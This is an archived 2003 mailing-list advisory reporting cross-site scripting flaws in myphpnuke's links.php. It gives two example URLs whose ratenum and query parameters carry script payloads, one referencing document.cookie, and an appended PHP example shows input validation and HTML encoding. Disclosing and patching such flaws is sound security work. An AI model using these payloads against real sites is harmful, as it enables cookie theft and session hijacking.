myphpnuke xss

From: Tacettin Karadeniz (tacettinkaradenizat_private)
Date: Wed Feb 19 2003 - 17:40:10 PST


    Vendor:
    http://www.myphpnuke.com
    
    Subject: 
    myphpnuke links.php vulnerability
    
    myphpnuke is a website portal tool written in PHP.
    There are many cross-site scripting issues in myphpnuke.
    
    Example:
    http://WEB/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(document.cookie);[/scr!pt]&ratetype=percent
    
    http://WEB/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettinat_private');[/scr!pt]?query=
    
    
    
    



    This archive was generated by hypermail 2b30 : Thu Feb 20 2003 - 05:18:11 PST
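
Both example URLs in the message depend on links.php writing a request parameter (ratenum, query) back into the page without encoding. The following is an added example, not myphpnuke's code and not part of the original post: a handler that validates ratenum and ratetype and HTML-encodes query on output. The function names, the second rate type 'num' and the 1 to 100 range are assumptions.

```php
<?php
// Added example: hypothetical handler, not taken from the myphpnuke source.

// Allowlist for ratetype. 'percent' appears in the advisory; 'num' is assumed.
const RATE_TYPES = ['percent', 'num'];

function clean_ratenum($raw, int $default = 10): int
{
    // Anything that is not a plain integer in range falls back to the default.
    $n = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    return $n === false ? $default : $n;
}

function clean_ratetype($raw, string $default = 'percent'): string
{
    return in_array($raw, RATE_TYPES, true) ? $raw : $default;
}

function h($raw): string
{
    // Encode at output time for HTML text and quoted-attribute contexts.
    return htmlspecialchars(is_string($raw) ? $raw : '',
        ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_links_page(array $get): string
{
    $op = $get['op'] ?? '';
    if ($op === 'MostPopular') {
        $num  = clean_ratenum($get['ratenum'] ?? null);
        $unit = clean_ratetype($get['ratetype'] ?? null) === 'percent' ? '%' : '';
        return "<h2>Most popular links: top {$num}{$unit}</h2>";
    }
    if ($op === 'search') {
        $q = h($get['query'] ?? '');
        return "<h2>Search results for \"{$q}\"</h2>"
             . "<input type=\"text\" name=\"query\" value=\"{$q}\">";
    }
    return '<h2>Links</h2>';
}

// Constructed input standing in for the advisory's placeholder markup.
$probe = '<script>alert(1)</script>';
echo render_links_page(['op' => 'MostPopular', 'ratenum' => $probe, 'ratetype' => 'percent']), "\n";
echo render_links_page(['op' => 'search', 'query' => $probe]), "\n";
```

With the constructed input, the MostPopular branch falls back to the default count and the search branch emits the markup as inert entities.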